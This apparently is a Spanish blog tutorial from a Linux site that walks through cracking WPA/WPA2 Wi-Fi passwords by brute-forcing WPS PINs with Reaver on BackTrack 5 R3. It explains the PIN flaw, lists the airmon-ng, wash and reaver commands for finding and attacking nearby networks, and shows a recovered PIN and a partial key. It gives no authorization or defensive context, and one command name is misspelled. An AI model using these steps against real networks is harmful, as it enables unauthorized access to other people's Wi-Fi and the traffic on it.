¡Hola! Bienvenido a Desde Linux. ¿Acaso estás harto de los pantallazos azules y los virus? Entonces, no dudes en migrar a Linux. Si recién empiezas, te recomendamos pasar por nuestra sección para Novatos. En caso de que estés buscando una Distribución Linux, tenemos guías para ayudarte a elegir la mejor. También contamos con un listado de Programas para reemplazar a los que usabas en Windows. No olvides utilizar la barra aquí debajo para obtener ayuda adicional.

Guia Reaver. Vulnerando WPA y WPA2 rapidamente.

ATAQUE REAVER CON BACK TRACK 5 R3 A REDES WEP, WPA Y WPA2 CON ROUTER ESTANDAR WPS.

el sistema WPS falla en uno de los métodos que el estándar tiene a la hora de añadir nuevos equipos a nuestra red WiFi, concretamente el que utiliza un número PIN, ya que el cliente que intenta conectar a la red puede enviar un número PIN cualquiera de 8 dígitos y si no coincide con el del punto de acceso éste le indica el error pero se ha descubierto que enviando únicamente los 4 primeros dígitos se consigue una respuesta. Así, el número de posibilidades para averiguar el número desciende desde los 100 millones de combinaciones a nada menos que 11.000, por lo que es cuestión de conseguirlo con un ataque de fuerza bruta en cuestión de horas.

Procedimiento

1er PASO.

Inicialmente vemos los adaptadores de red existentes.

comando: airom-ng

2do PASO.

Se habilita el modo de monitor.

Comando airmon-ng start wlan0,debe quedar habilitada la interface mon0,que es con la que se va a lanzar el ataque reaver.

 

BT1

Gráfica pasos 1 y 2..

3ER PASO.

Chequeamos las redes que tienen el WPS unlocked que se pueden atacar (nota si dando el comando no aparece ninguna red, quiere decir que no hay redes con estas características en el área).

Comando wash -i mon0

 

BT2

 

 

4TO Y ULTIMO PASO.

 

iniciamos nuestro ataque, el cual no es por paquetes como los anteriores, es por pines el sistema testea todas las combinaciones posibles de un grupo de 8 dígitos (nota en las redes que se vulneraron el pin era 12345670) en caso de haber otra combinación se demora de 1 a 2 horas) que necesita para acceder a la clave.

Comando reaver -i mon0 -b (bssid) -c (canal) -vv

 

BT3

 

como pueden ver el pin es 12345670

y la clave es 364137324339… Y LA RED ES UNA WPA.

Saludos.!


@Jlcmux

@Jlcmux: Colombiano - Geek - Twitter @Jlcmux


No olvides dejar tu comentario

Tu dirección de correo electrónico no será publicada.

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Current day month ye@r *

  1. redactor
    • freebsddick lector
      • lector
        • lector
          • lector
          • lector
        • lector
          • lector
          • usuario
          • lector
          • pandev92 redactor
      • redactor
  2. redactor
    • lector
      • lector
        • lector
        • lector
  3. lector
    • lector
  4. lector
  5. lector
    • lector
      • lector
  6. lector
  7. usuario
  8. usuario
    • lector
      • lector
        • lector
          • lector
  9. lector
  10. ripper2hl lector
  11. usuario
  12. lector
  13. lector
    • lector
  14. lector

DesdeLinux y DesdeFirefoxOS se encuentran felizmente hosteados en GNUTransfer